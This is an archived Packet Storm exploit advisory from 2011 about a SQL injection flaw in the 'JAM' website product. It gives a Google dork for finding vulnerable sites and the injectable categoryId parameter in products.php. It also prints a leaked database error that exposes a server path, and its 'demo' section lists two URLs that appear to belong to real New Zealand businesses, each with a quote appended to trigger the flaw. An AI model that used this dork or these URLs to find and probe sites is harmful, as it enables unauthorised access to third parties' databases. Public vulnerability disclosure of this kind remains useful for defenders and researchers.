JAM SQL Injection

2011-09-14T00:00:00
ID PACKETSTORM:105112
Type packetstorm
Reporter nGa Sa Lu
Modified 2011-09-14T00:00:00

Description

                                        
                                            ` _________________________________________________________  
#   
# Exploit Title: JAM SQL Injection Vulnerability   
# Google Dork: intext:"This site is preserved by JAM"   
# Date: 2011-15-09   
# Author: nGa Sa Lu [ N-S-L ]   
# Service Link: http://www.jamarketing.co.nz   
# Tested on: Debian GNU/Linux 5.0   
# ________________________________________________________   
  
# Google Dork : intext:"This site is preserved by JAM"  
-------------------------------------------------------  
  
------------------------------------------------------------------------------------------------  
www.localhost.com/products.php?action=viewCategoryProducts&page=1&categoryId=[SQL]  
------------------------------------------------------------------------------------------------  
  
# SQL Error Statement  
------------------------  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/jenniferannweb/advancehire.co.nz/functions.php on line 143  
  
# Demo  
---------  
http://www.advancehire.co.nz/products.php?action=viewCategoryProducts&page=1&categoryId=30'  
http://www.bellachic.co.nz/product_reviews_info.php?products_id=537&reviews_id=52'  
`